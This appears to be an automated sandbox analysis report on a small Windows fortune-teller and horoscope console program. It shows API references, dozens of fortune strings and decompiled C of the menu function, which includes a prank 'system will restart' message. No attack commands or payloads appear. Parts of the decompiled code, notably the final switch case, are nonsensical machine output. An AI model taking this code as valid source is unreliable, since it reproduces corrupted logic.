                                                                          0x013d150f
                                                                          0x013d1516
                                                                          0x013d151d
                                                                          0x013d1524
                                                                          0x013d152b
                                                                          0x013d1538
                                                                          0x013d153d
                                                                          0x013d1542
                                                                          0x013d154c
                                                                          0x013d1551
                                                                          0x013d1556
                                                                          0x013d1560
                                                                          0x013d1565
                                                                          0x013d156a
                                                                          0x013d1574
                                                                          0x013d1579
                                                                          0x013d1583
                                                                          0x013d1588
                                                                          0x013d158e
                                                                          0x013d158e
                                                                          0x013d158e
                                                                          0x013d1590
                                                                          0x013d1597
                                                                          0x013d1598
                                                                          0x013d159d
                                                                          0x013d15a2
                                                                          0x013d15a7
                                                                          0x013d15b1
                                                                          0x013d15c1

                                                                          APIs
                                                                          • __time64.LIBCMT ref: 013D1532
                                                                            • Part of subcall function 013DC26F: GetSystemTimeAsFileTime.KERNEL32(013D1537,?,?,?,013D1537,00000000), ref: 013DC27A
                                                                            • Part of subcall function 013DC26F: __aulldiv.LIBCMT ref: 013DC29A
                                                                            • Part of subcall function 013DBDEC: __getptd.LIBCMT ref: 013DBDF1
                                                                          • _wprintf.LIBCMT ref: 013D154C
                                                                          • _wprintf.LIBCMT ref: 013D1560
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1574
                                                                          • _rand.LIBCMT ref: 013D1583
                                                                            • Part of subcall function 013DBDFE: __getptd.LIBCMT ref: 013DBDFE
                                                                          • _wprintf.LIBCMT ref: 013D159D
                                                                          • _wprintf.LIBCMT ref: 013D15B1
                                                                            • Part of subcall function 013EDBFD: __lock.LIBCMT ref: 013EDC0B
                                                                            • Part of subcall function 013EDBFD: __getch_nolock.LIBCMT ref: 013EDC15
                                                                          Strings
                                                                          • YOU WILL RECEIVE A FORTUNE., xrefs: 013D1428
                                                                          • A COMPLEX SYSTEM THAT WORKS IS INVARIABLY FOUND TO HAVE EVOLVED FROM A SIMPLE SYSTEM THAT WORKS., xrefs: 013D1256
                                                                          • YOU WILL MAKE A SUDDEN RISE IN LIFE., xrefs: 013D1457
                                                                          • IT'S TIME YOU ASKED THAT SPECIAL SOMEONE OUT ON A DATE., xrefs: 013D1501
                                                                          • A BLACK CAT CROSSING YOUR PATH SIGNIFIES THAT THE ANIMAL IS GOING SOMEWHERE., xrefs: 013D1260
                                                                          • A FANATIC IS ONE WHO CAN'T CHANGE HIS MIND, AND WON'T CHANGE THE SUBJECT., xrefs: 013D1404
                                                                          • WE CANNOT DO GREAT THINGS; ONLY SMALL THINGS WITH GREAT LOVE. -- MOTHER TERESA., xrefs: 013D1210
                                                                          • YOUR PRESENT PLANS ARE GOING TO SUCCEED., xrefs: 013D14D7
                                                                          • YOU DONT REALLY BELIEVE IN FORTUNES., xrefs: 013D1300
                                                                          • MANY CHANGES OF MIND AND MOOD; DO NOT HESITATE TOO LONG., xrefs: 013D12CE
                                                                          • YOU CAN ALWAYS FIND HAPPINESS AT WORK ON FRIDAY., xrefs: 013D13FA
                                                                          • SING AND REJOICE, FORTUNE IS SMILING ON YOU., xrefs: 013D1432
                                                                          • YOU'RE STUPID., xrefs: 013D136E
                                                                          • YOU ARE GOING TO HAVE SOME NEW CLOTHES., xrefs: 013D11D8
                                                                          • YOU WILL BECOME BETTER ACQUAINTED WITH A COWORKER., xrefs: 013D152B
                                                                          • A GOOD TIME TO FINISH UP OLD TASKS., xrefs: 013D12F6
                                                                          • YOU WILL ALWAYS BE SUCCESSFUL IN YOUR PROFESSIONAL CAREER., xrefs: 013D14AB
                                                                          • A TUB AND A RUB WILL CHANGE YOUR DAY., xrefs: 013D13BE
                                                                          • NONE OF THE SECRETS OF SUCCESS WILL WORK UNLESS YOU DO., xrefs: 013D1224
                                                                          • ACCEPT THE NEXT PROPOSITION YOU HEAR., xrefs: 013D148F
                                                                          • YOUR HOME IS A PLEASANT PLACE FROM WHICH YOU DRAW HAPPINESS., xrefs: 013D14EC
                                                                          • HE WHO FARTS IN CHURCH, SITS IN HIS OWN PEW!, xrefs: 013D141E
                                                                          • THE WORLD MAY BE YOUR OYSTER, BUT IT DOESN'T MEAN YOU'LL GET ITS PEARL., xrefs: 013D11EC
                                                                          • DO NOT MISTAKE TEMPTATION FOR OPPORTUNITY., xrefs: 013D11E2
                                                                          • THERE IS NO MISTAKE SO GREAT AS THAT OF BEING ALWAYS RIGHT., xrefs: 013D13AA
                                                                          • ------------------------------------------------------------------, xrefs: 013D153D, 013D1551
                                                                          • A SECRET ADMIRER WILL SOON SEND YOU A SIGN OF AFFECTION., xrefs: 013D1206
                                                                          • GET A LIFE!, xrefs: 013D12C4
                                                                          • IF YOU WANT THE RAINBOW, YOU MUST TO PUT UP WITH THE RAIN. -- D. PARTON, xrefs: 013D1242
                                                                          • YOUR TALENTS WIL BE RECOGNIZED AND SUITABLY REWARDED., xrefs: 013D11CE, 013D1597
                                                                          • AND NOW THE TIME FOR SOMETHING COMPLETELY DIFFERENT.THE HARD TIMES WILL BEGIN TO FADE, JOY WILL TAKE THEIR PLACE., xrefs: 013D126A
                                                                          • YOU LEAD A USEFUL LIFE NO MATTER WHAT RICHES ARE COMING TO YOU., xrefs: 013D14BB
                                                                          • STAY AWAKE TILL LATE TODAY., xrefs: 013D130A
                                                                          • SMALL ONES CAN BE JUST AS EFFECTIVE., xrefs: 013D127E
                                                                          • HELP! IM STUCK INSIDE THE FORTUNE TELLER!, xrefs: 013D13A0
                                                                          • A BUG IN THE HAND IS BETTER THAN ONE AS YET UNDETECTED., xrefs: 013D124C
                                                                          • YOU'LL DIE IN A LOTTLE MORE THAN A MONTH., xrefs: 013D12EC
                                                                          • THESE THREE GO TOGETHER:YOU WILL BE CALLED UPON TO HELP A FRIEND IN TROUBLE.DON'T LET FRIENDS IMPOSE ON YOU, WORK CALMLY AND SILENTLY.YOUR ROAD WILL BE MADE SMOOTH FOR YOU BY GOOD FRIENDS., xrefs: 013D14A4
                                                                          • THE TIME IS RIGHT TO MAKE NEW FRIENDS., xrefs: 013D1450
                                                                          • IN GOD (SIC) WE TRUST; ALL OTHERS MUST PAY CASH., xrefs: 013D149D
                                                                          • STAY AWAY FROM CARS TODAY., xrefs: 013D12D8
                                                                          • NEVER TROUBLE TROUBLE UNTIL TROUBLE TROUBLES YOU., xrefs: 013D1350
                                                                          • YOU HAVE TAKEN YOURSELF TOO SERIOUSLY., xrefs: 013D1364
                                                                          • O-SO DAY FOR YOU., xrefs: 013D129C
                                                                          • WHAT HAPPENED LAST NIGHT CAN HAPPEN AGAIN., xrefs: 013D133C
                                                                          • YOU HAVE THE RARE ABILITY TO RECOGNIZE ABILITY IN OTHERS., xrefs: 013D143C
                                                                          • A FRIEND ASKS ONLY FOR YOUR TIME, NOT YOUR MONEY., xrefs: 013D1346
                                                                          • SOMEONE HAS COMPLEMENTED YOU TODAY IN YOUR ABSENCE., xrefs: 013D1524
                                                                          • FINE DAY FOR FRIENDS., xrefs: 013D1292
                                                                          • YOU WILL RECEIVE A FORTUNE COOKIE., xrefs: 013D138C
                                                                          • YOUR HEART IS PURE, AND YOUR MIND CLEAR, AND SOUL DEVOUT., xrefs: 013D1473
                                                                          • SOMEONE WILL INVITE YOU TO A KARAOKE PARTY., xrefs: 013D1396
                                                                          • YOU ARE A HAPPY MAN., xrefs: 013D14D0
                                                                          • HAPPINESS ALWAYS ACCOMPANIES WITH YOU., xrefs: 013D146C
                                                                          • YOU SHOULD BE ABLE TO UNDERTAKE AND COMPLETE ANYTHING., xrefs: 013D1496
                                                                          • THE GREATEST DANGER COULD BE YOUR STUPIDITY., xrefs: 013D11FC
                                                                          • TRUST YOUR INTUITION. THE UNIVERSE IS GUIDING YOUR LIFE., xrefs: 013D1238
                                                                          • IT IS SO VERY HARD TO BE AN ON-YOUR-OWN-TAKE-CARE-OF-YOURSELF-BECAUSE-THERE-IS-NO-ONE-ELSE-TO-DO-IT-FOR-YOU GROWNUP., xrefs: 013D12A6
                                                                          • YOU WILL HAVE A FINE CAPACITY FOR THE ENJOYMENT OF LIFE., xrefs: 013D1481
                                                                          • YOU'LL BE SURPRISED., xrefs: 013D1314
                                                                          • A ROLLING STONE GATHERS NO MOSS., xrefs: 013D13F0
                                                                          • YOU WILL ENJOY GOOD HEALTH., xrefs: 013D1488
                                                                          • YOU ARE VERY EXPRESSIVE AND POSITIVE IN WORDS, ACT AND FEELING., xrefs: 013D122E
                                                                          • DON'T YOU WISH YOU HAD MORE ENERGY... OR LESS AMBITION?, xrefs: 013D1288
                                                                          • YOU WILL MAKE A GREAT LAWYER., xrefs: 013D13DC
                                                                          • YOUR GOOD DEEDS ARE NEVER FORGOTTEN., xrefs: 013D14FA
                                                                          • LIFE TO YOU IS A DASHING AND BOLD ADVENTURE., xrefs: 013D1446
                                                                          • YOU NEED SOME FUN IN LIFE., xrefs: 013D1332
                                                                          • YOU'LL LEARN A LOT TODAY.YOU HAVE UNUSUAL EQUIPMENT FOR SUCCESS, USE IT PROPERLY., xrefs: 013D1382
                                                                          • LET YOUR FOOT LOOSE TODAY!, xrefs: 013D131E
                                                                          • A VISIT TO A MUSEUM WILL BRING YOU A NEW SENSE OF APPRECIATION., xrefs: 013D14F3
                                                                          • YOU COULD PROSPER IN THE FIELD OF MEDICAL RESEARCH., xrefs: 013D14C9
                                                                          • YOUR CRUSH WILL MEET TO YOU TODAY., xrefs: 013D1328
                                                                          • A PLEASANT SURPRISE IS WAITING FOR YOU., xrefs: 013D14DE
                                                                          • Enter any key to continue..., xrefs: 013D15A2
                                                                          • YOU HAVE THE CAPACITY TO LEARN FROM MISTAKES., xrefs: 013D1378
                                                                          • ITS A VERY *__UN*LUCKY WEEK IN WHICH TO BE TOOK DEAD., xrefs: 013D12B0
                                                                          • IT'S ALL IN YOUR HEAD., xrefs: 013D12BA
                                                                          • MISUNDERSTANDING WILL BREAK YOUR FRIENDSHIP SOON., xrefs: 013D135A
                                                                          • A CLOSED MOUTH GATHERS NO FEET., xrefs: 013D13D2
                                                                          • EAT YOUR VEGETABLE AND YOU WILL BE STRONG LIKE POPEYE., xrefs: 013D13C8
                                                                          • YOU WILL HAVE A LONG AND HEALTHY LIFE., xrefs: 013D1516
                                                                          • YOUR FORTUNE FOR TODAY:, xrefs: 013D1565
                                                                          • YOU WERE BORN WITH THE SKILL TO COMMUNICATE WITH PEOPLE EASILY., xrefs: 013D121A
                                                                          • HE WHO LAUGHS AT HIMSELF NEVER RUNS OUT OF THINGS TO LAUGH AT., xrefs: 013D140E
                                                                          • SOMEONE THINKS YOU ARE WONDERFULLY MYSTERIOUS, xrefs: 013D13B4
                                                                          • YOUR MIND IS CREATIVE, ORIGINAL AND ALERT., xrefs: 013D14C2
                                                                          • FLATTERY WILL GO FAR TONIGHT., xrefs: 013D11C9
                                                                          • WHEN WINTER COMES HEAVEN WILL RAIN SUCCESS ON YOU., xrefs: 013D147A
                                                                          • THESE TWO GO TOGETHER:YOU HAVE MUCH SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE.YOU HAVE GREAT SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE., xrefs: 013D14E5
                                                                          • ALL YOUR HARD WORK WILL SOON PAY OFF., xrefs: 013D12E2
                                                                          • THERE IS NO WISDOM GREATER THAN KINDNESS., xrefs: 013D14B2
                                                                          • WISH YOU A LONG LIFE., xrefs: 013D150F
                                                                          • LIES TODAY., xrefs: 013D1274
                                                                          • SOMEONE FROM YOUR PAST HAS RETURNED TO STEAL YOUR HEART., xrefs: 013D145E
                                                                          • HAPPINESS IS FOUND WHEN ONE IS NOT LOOKING., xrefs: 013D151D
                                                                          • YOU DISPLAY THE WONDERFUL TRAITS OF CHARM AND COURTESY., xrefs: 013D1465
                                                                          • THE WORLD IS ALWAYS READY TO RECIEVE TALENT WITH OPEN ARMS., xrefs: 013D1508
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$Time__getptd$FileSystem__aulldiv__ftbuf__getch_nolock__lock__output_l__stbuf__time64_rand
                                                                          • String ID: ------------------------------------------------------------------$A BLACK CAT CROSSING YOUR PATH SIGNIFIES THAT THE ANIMAL IS GOING SOMEWHERE.$A BUG IN THE HAND IS BETTER THAN ONE AS YET UNDETECTED.$A CLOSED MOUTH GATHERS NO FEET.$A COMPLEX SYSTEM THAT WORKS IS INVARIABLY FOUND TO HAVE EVOLVED FROM A SIMPLE SYSTEM THAT WORKS.$A FANATIC IS ONE WHO CAN'T CHANGE HIS MIND, AND WON'T CHANGE THE SUBJECT.$A FRIEND ASKS ONLY FOR YOUR TIME, NOT YOUR MONEY.$A GOOD TIME TO FINISH UP OLD TASKS.$A PLEASANT SURPRISE IS WAITING FOR YOU.$A ROLLING STONE GATHERS NO MOSS.$A SECRET ADMIRER WILL SOON SEND YOU A SIGN OF AFFECTION.$A TUB AND A RUB WILL CHANGE YOUR DAY.$A VISIT TO A MUSEUM WILL BRING YOU A NEW SENSE OF APPRECIATION.$ACCEPT THE NEXT PROPOSITION YOU HEAR.$ALL YOUR HARD WORK WILL SOON PAY OFF.$AND NOW THE TIME FOR SOMETHING COMPLETELY DIFFERENT.THE HARD TIMES WILL BEGIN TO FADE, JOY WILL TAKE THEIR PLACE.$DO NOT MISTAKE TEMPTATION FOR OPPORTUNITY.$DON'T YOU WISH YOU HAD MORE ENERGY... OR LESS AMBITION?$EAT YOUR VEGETABLE AND YOU WILL BE STRONG LIKE POPEYE.$Enter any key to continue...$FINE DAY FOR FRIENDS.$FLATTERY WILL GO FAR TONIGHT.$GET A LIFE!$HAPPINESS ALWAYS ACCOMPANIES WITH YOU.$HAPPINESS IS FOUND WHEN ONE IS NOT LOOKING.$HE WHO FARTS IN CHURCH, SITS IN HIS OWN PEW!$HE WHO LAUGHS AT HIMSELF NEVER RUNS OUT OF THINGS TO LAUGH AT.$HELP! IM STUCK INSIDE THE FORTUNE TELLER!$IF YOU WANT THE RAINBOW, YOU MUST TO PUT UP WITH THE RAIN. -- D. PARTON$IN GOD (SIC) WE TRUST; ALL OTHERS MUST PAY CASH.$IT IS SO VERY HARD TO BE AN ON-YOUR-OWN-TAKE-CARE-OF-YOURSELF-BECAUSE-THERE-IS-NO-ONE-ELSE-TO-DO-IT-FOR-YOU GROWNUP.$IT'S ALL IN YOUR HEAD.$IT'S TIME YOU ASKED THAT SPECIAL SOMEONE OUT ON A DATE.$ITS A VERY *__UN*LUCKY WEEK IN WHICH TO BE TOOK DEAD.$LET YOUR FOOT LOOSE TODAY!$LIES TODAY.$LIFE TO YOU IS A DASHING AND BOLD ADVENTURE.$MANY CHANGES OF MIND AND MOOD; DO NOT HESITATE TOO LONG.$MISUNDERSTANDING WILL BREAK YOUR FRIENDSHIP SOON.$NEVER TROUBLE TROUBLE UNTIL TROUBLE TROUBLES YOU.$NONE OF THE SECRETS OF SUCCESS WILL WORK UNLESS YOU DO.$O-SO DAY FOR YOU.$SING AND REJOICE, FORTUNE IS SMILING ON YOU.$SMALL ONES CAN BE JUST AS EFFECTIVE.$SOMEONE FROM YOUR PAST HAS RETURNED TO STEAL YOUR HEART.$SOMEONE HAS COMPLEMENTED YOU TODAY IN YOUR ABSENCE.$SOMEONE THINKS YOU ARE WONDERFULLY MYSTERIOUS$SOMEONE WILL INVITE YOU TO A KARAOKE PARTY.$STAY AWAKE TILL LATE TODAY.$STAY AWAY FROM CARS TODAY.$THE GREATEST DANGER COULD BE YOUR STUPIDITY.$THE TIME IS RIGHT TO MAKE NEW FRIENDS.$THE WORLD IS ALWAYS READY TO RECIEVE TALENT WITH OPEN ARMS.$THE WORLD MAY BE YOUR OYSTER, BUT IT DOESN'T MEAN YOU'LL GET ITS PEARL.$THERE IS NO MISTAKE SO GREAT AS THAT OF BEING ALWAYS RIGHT.$THERE IS NO WISDOM GREATER THAN KINDNESS.$THESE THREE GO TOGETHER:YOU WILL BE CALLED UPON TO HELP A FRIEND IN TROUBLE.DON'T LET FRIENDS IMPOSE ON YOU, WORK CALMLY AND SILENTLY.YOUR ROAD WILL BE MADE SMOOTH FOR YOU BY GOOD FRIENDS.$THESE TWO GO TOGETHER:YOU HAVE MUCH SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE.YOU HAVE GREAT SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE.$TRUST YOUR INTUITION. THE UNIVERSE IS GUIDING YOUR LIFE.$WE CANNOT DO GREAT THINGS; ONLY SMALL THINGS WITH GREAT LOVE. -- MOTHER TERESA.$WHAT HAPPENED LAST NIGHT CAN HAPPEN AGAIN.$WHEN WINTER COMES HEAVEN WILL RAIN SUCCESS ON YOU.$WISH YOU A LONG LIFE.$YOU ARE A HAPPY MAN.$YOU ARE GOING TO HAVE SOME NEW CLOTHES.$YOU ARE VERY EXPRESSIVE AND POSITIVE IN WORDS, ACT AND FEELING.$YOU CAN ALWAYS FIND HAPPINESS AT WORK ON FRIDAY.$YOU COULD PROSPER IN THE FIELD OF MEDICAL RESEARCH.$YOU DISPLAY THE WONDERFUL TRAITS OF CHARM AND COURTESY.$YOU DONT REALLY BELIEVE IN FORTUNES.$YOU HAVE TAKEN YOURSELF TOO SERIOUSLY.$YOU HAVE THE CAPACITY TO LEARN FROM MISTAKES.$YOU HAVE THE RARE ABILITY TO RECOGNIZE ABILITY IN OTHERS.$YOU LEAD A USEFUL LIFE NO MATTER WHAT RICHES ARE COMING TO YOU.$YOU NEED SOME FUN IN LIFE.$YOU SHOULD BE ABLE TO UNDERTAKE AND COMPLETE ANYTHING.$YOU WERE BORN WITH THE SKILL TO COMMUNICATE WITH PEOPLE EASILY.$YOU WILL ALWAYS BE SUCCESSFUL IN YOUR PROFESSIONAL CAREER.$YOU WILL BECOME BETTER ACQUAINTED WITH A COWORKER.$YOU WILL ENJOY GOOD HEALTH.$YOU WILL HAVE A FINE CAPACITY FOR THE ENJOYMENT OF LIFE.$YOU WILL HAVE A LONG AND HEALTHY LIFE.$YOU WILL MAKE A GREAT LAWYER.$YOU WILL MAKE A SUDDEN RISE IN LIFE.$YOU WILL RECEIVE A FORTUNE COOKIE.$YOU WILL RECEIVE A FORTUNE.$YOU'LL BE SURPRISED.$YOU'LL DIE IN A LOTTLE MORE THAN A MONTH.$YOU'LL LEARN A LOT TODAY.YOU HAVE UNUSUAL EQUIPMENT FOR SUCCESS, USE IT PROPERLY.$YOU'RE STUPID.$YOUR CRUSH WILL MEET TO YOU TODAY.$YOUR FORTUNE FOR TODAY:$YOUR GOOD DEEDS ARE NEVER FORGOTTEN.$YOUR HEART IS PURE, AND YOUR MIND CLEAR, AND SOUL DEVOUT.$YOUR HOME IS A PLEASANT PLACE FROM WHICH YOU DRAW HAPPINESS.$YOUR MIND IS CREATIVE, ORIGINAL AND ALERT.$YOUR PRESENT PLANS ARE GOING TO SUCCEED.$YOUR TALENTS WIL BE RECOGNIZED AND SUITABLY REWARDED.
                                                                          • API String ID: 2618567428-78579811
                                                                          • Opcode ID: 6bc8bf78364adb222f1be4f8bd132fe1e914732c1cbff641c5638d9e6e17a50b
                                                                          • Instruction ID: efca257b655db69b7ecb5eabdb6054e5dc1e3204e989906857b7ef18bc9ad387
                                                                          • Opcode Fuzzy Hash: 6bc8bf78364adb222f1be4f8bd132fe1e914732c1cbff641c5638d9e6e17a50b
                                                                          • Instruction Fuzzy Hash: 40913BB88013A9DBDB68DF9599496DEBAB0BB4630CF5045CCD2583B310CB708A8DCF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D5310, Relevance: 156.2, APIs: 57, Strings: 32, Instructions: 499COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E013D5310(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, DWORD* _a4, int _a8, int _a12, DWORD* _a16, intOrPtr _a101, intOrPtr _a939605336, intOrPtr _a1409744965, intOrPtr _a1710096689) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				DWORD* _v12;
				DWORD** _v16;
				int _v20;
				char _v23;
				char* _v24;
				char* _v28;
				char* _v32;
				char _v34;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				DWORD* _v56;
				signed int _v72;
				DWORD* _v76;
				DWORD* _v80;
				char* _v84;
				DWORD* _v104;
				char* _v108;
				char* _v112;
				char _v116;
				DWORD* _v120;
				signed int _v124;
				char _v133;
				DWORD* _v152;
				char _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				DWORD* _v172;
				signed int _v176;
				DWORD* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				intOrPtr _v234799778;
				intOrPtr _v234799789;
				signed int _v950997971;
				int __ebp;
				signed int _t626;
				void* _t664;
				signed int _t679;
				int _t681;
				void* _t684;
				void* _t686;
				void* _t689;

				_t690 = __eflags;
				_t678 = __edi;
				_t664 = __ecx;
				_push(__ebx);
				_push(__esi);
				E013DB418(__ebx, _t673, __eflags, "cls");
				_t681 = _a12;
				_push(_t681);
				_push("Name: %s");
				 *0x13fe250 = 0x30037;
				E013DB9F5(__ebx, _t673, __edi, _t681, __eflags);
				_t662 = _a8;
				_push(0x7da);
				_push("Age=%d");
				 *0x13fe250 = 0x40037;
				_v20 = 0x7da - _a8;
				E013DB9F5(_a8, _t673, __edi, _t681, __eflags);
				 *0x13fe250 = 0x50037;
				_v24 = _a16;
				_push(E013DC111(_a16));
				_push("Sex=%c");
				E013DB9F5(_a8, _t673, __edi, _t681, _t690);
				_push("Your horoscope sign is Libra-The Balance");
				 *0x13fe250 = 0x20003;
				E013DB9F5(_a8, _t673, __edi, _t681, _t690);
				_push("__");
				 *0x13fe250 = 0x3000a;
				E013DB9F5(_t662, _t673, __edi, _t681, _t690);
				_push("___.\'  \'.___");
				 *0x13fe250 = 0x40005;
				E013DB9F5(_t662, _t673, __edi, _t681, _t690);
				_push("____________\n\n");
				 *0x13fe250 = 0x50005;
				E013DB9F5(_t662, _t673, __edi, _t681, _t690);
				_t686 = _t684 - 0x20 + 0x30;
				_v36 = "\n*  You are rarely lazy.";
				_v32 = "\n*  You work hard, and also demand that your partners work just as hard.";
				_v28 = "\n*  You have a strong sense of justice and fair play.";
				_t626 = E013D1C60(_t662, _t664, __edi, _t681, _t690) - 1;
				if(_t626 > 5) {
					L32:
					E013DB9F5(_t662, _t673, _t678, _t681, _t697);
					return  *0x13d0000("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
				} else {
					_push(__edi);
					_t679 = _a4;
					do {
						switch( *((intOrPtr*)(_t626 * 4 +  &M013D5AB8))) {
							case 0:
								E013DB418(_t662, _t673, _t691, "cls");
								E013D1C00(_t662, _t681, _t679, _t681, _t691, _a16, _t662);
								E013D18E0();
								_push("HERE IS WHAT YOU ARE!!!\n");
								 *0x13fe250 = 0x80001;
								E013DB9F5(_t662, _t681, _t679, _t681, _t691);
								_t688 = _t686 + 0x10;
								 *0x13fe250 = 0x90001;
								if(_t679 <= 0xa) {
									_a8 = _t679;
									_t633 = _t679;
								} else {
									_t633 = _t679 - (0x66666667 * _t679 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t679 >> 0x20 >> 2) + ((0x66666667 * _t679 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t679 >> 0x20 >> 2)) * 4 + (0x66666667 * _t679 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t679 >> 0x20 >> 2) + ((0x66666667 * _t679 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t679 >> 0x20 >> 2)) * 4;
									_a8 = _t633;
								}
								if(_t633 == 0) {
									_a8 = 5;
									_t633 = _a8;
								}
								_v8 = _t633;
								_t635 = _t633 + _t633 + _t633 + _t633;
								_t673 = _t683 + _t635 - 0x24;
								_v16 = 1;
								_v12 = _t683 + _t635 - 0x24;
								while(1) {
									_t695 = _v8 - 0x30;
									if(_v8 > 0x30) {
										break;
									}
									_push( *_v12);
									_push("\n\n%s");
									E013DB9F5(_t662, _t673, _t679, _t681, _t695);
									_push("\nEnter any key....");
									E013DB9F5(_t662, _t673, _t679, _t681, _t695);
									_t688 = _t688 + 0xc;
									E013EDBFD(_t662, _t679, _t681, _t695);
									_t668 = _a8;
									_v8 = _v8 + _t668;
									_v12 = _v12 + _t668 + _t668 + _t668 + _t668;
									_t654 =  &(_v16[0]);
									_v16 = _t654;
									_t696 = _t654 - 5;
									if(_t654 < 5) {
										continue;
									}
									break;
								}
								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
								E013DB9F5(_t662, _t673, _t679, _t681, _t696);
								_push("\n\n\n\n\nEnter any key.....");
								E013DB9F5(_t662, _t673, _t679, _t681, _t696);
								_t689 = _t688 + 8;
								E013EDBFD(_t662, _t679, _t681, _t696);
								goto L30;
							case 1:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__edx = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D18E0();
								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
								goto L30;
							case 2:
								E013DB418(__ebx, __edx, __eflags, "cls") = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D18E0();
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0x100005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edi * 8 = __edi * 8 - __edi;
								_push(__edi * 8 - __edi);
								_push("YOUR LUCKY NUMBERS ARE: %d\t");
								 *0x13fe250 = 0xc000a;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx =  &(__edi[2]);
								_push(__edx);
								_push("%d\t");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__ecx = __edi;
								__ecx = __edi * 0x31;
								__eax = 0x8d3dcb09;
								__edx = 0x8d3dcb09 * __ecx >> 0x20;
								__eax = 0x8d3dcb09 * __ecx;
								__edx = (0x8d3dcb09 * __ecx >> 0x20) + __ecx;
								__edx = (0x8d3dcb09 * __ecx >> 0x20) + __ecx >> 4;
								__edx = __edx >> 0x1f;
								__eax = __edx + (__edx >> 0x1f);
								_push(__edx + (__edx >> 0x1f));
								_push("%d\t");
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
								__edx = 0x66666667 * __edi >> 0x20;
								__eax = 0x66666667 * __edi;
								__edx = 0x66666667 * __edi >> 0x20 >> 1;
								__eax = __edx + (__edx >> 0x1f);
								__ecx = __eax + __eax * 4;
								__edx = __edi + __edi;
								__edx = __edi + __edi - __eax + __eax * 4;
								_push(__edx);
								_push("%d\t");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("Enter any key to continue...");
								 *0x13fe250 = 0x160032;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0x38 + __esp;
								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
								goto L30;
							case 3:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__edx = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, _a16, __ebx) = E013D18E0();
								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 0xb;
								if(__eflags <= 0) {
									switch( *((intOrPtr*)(__eax * 4 +  &M013D5AD0))) {
										case 0:
											goto L17;
										case 1:
											goto L18;
										case 2:
											goto L19;
										case 3:
											goto L20;
										case 4:
											goto L21;
										case 5:
											goto L22;
										case 6:
											goto L23;
										case 7:
											goto L24;
										case 8:
											goto L25;
										case 9:
											goto L26;
										case 0xa:
											goto L27;
										case 0xb:
											goto L28;
									}
								}
								goto L30;
							case 4:
								_push(E013DB07D());
								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								goto L30;
							case 5:
								_push(0);
								__al = __al + __ch;
								gs =  *__edx;
								_a1409744965 = _a1409744965 + __cl;
								__eflags = __eax - 0x3d54f201;
								 *__edx =  *__edx + __ebx;
								_push(__ebp);
								__eflags = __eax - 0x3d55f001;
								 *((intOrPtr*)(__edx - 0x51fec2a7)) =  *((intOrPtr*)(__edx - 0x51fec2a7)) + __edi;
								_pop(__edx);
								__eflags = __eax - 0x3d562401;
								 *((intOrPtr*)(__ecx + 0x56)) =  *((intOrPtr*)(__ecx + 0x56)) + __esi;
								__eflags = __eax - 0x3d56be01;
								 *__ebx =  *__ebx + __ecx;
								_push(__edi);
								__eflags = __eax - 0x3d575801;
								_v234799789 = _v234799789 + __esp;
								_push(__edi);
								__eflags = __eax - 0x3d583f01;
								 *((intOrPtr*)(__eax + 0x58d9013d + __ebx * 2)) =  *((intOrPtr*)(__eax + 0x58d9013d + __ebx * 2)) + __ecx;
								__eflags = __eax - 0x3d592601;
